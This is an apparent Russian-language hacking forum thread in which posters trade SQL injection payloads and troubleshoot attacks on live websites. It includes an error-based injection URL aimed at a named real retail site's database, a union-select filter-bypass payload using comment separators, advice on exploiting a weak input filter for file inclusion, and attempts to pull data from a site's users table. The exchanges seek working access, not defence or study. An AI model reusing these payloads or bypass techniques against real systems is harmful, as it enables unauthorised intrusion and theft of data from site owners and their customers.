нет когда нет поля он пишет. Microsoft OLE DB Provider for ODBC Drivers error '80004005' [TCX][MyODBC]Unknown column 'admin' in 'field list' Развожу руками((
SeNaP да не откуда, просто пошел интерес и хочется что то понять в это деле. Думал нашел нить и можно цеплятся, а вот облом
Code: http://www.limenatural.co.uk/prod1.asp?ID=1+or+(1,1)=(select+count(0),concat((select+version()),floor(rand(0)*2))+from(orders)+group+by+2)
Возможно ли обойти ? PHP: if (isset($_GET['pagina'])) { $tmp = $_GET['pagina']; $tmp1 = (eregi_replace("['<>(){}!$%&+@|;'\]","",$tmp));
Code: 1/**/union/**/select/**/table_name/**/information_schema.tables/**/limit/**/1,1 Что то типа такого, можно ведь обойтись спокойно и без того что там фильтруется если скуля стандартная. Если хотел воспользоваться теми символами что там режутся то в этой статье упоминается про eregi, так что смею предположить что в новых версиях php это не актуально в отличии от ereg.
точки и слеша в регулярке нет - спокойно можно их юзать, ведь там инклюд же, судя по названию пеерменной
Может ли существовать фильтрация на выходе www.************.com/index.php?eid=1+union+select+ID+from+users -- подбирая таблицы и строки пришёл к тому что 100% существуют эта таблица и строка Может ли быть фильтрация на выходе, потому что после того как я делаю этот запрос выходит окно , как будто без юнион селекта, но без вывода необходимых мне данных.
Почему при запросе http://site/traw/4602'--+/ SELECT * FROM tse_articles WHERE id='4602'--+' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Пробовал много вариантов все равно одно и тоже
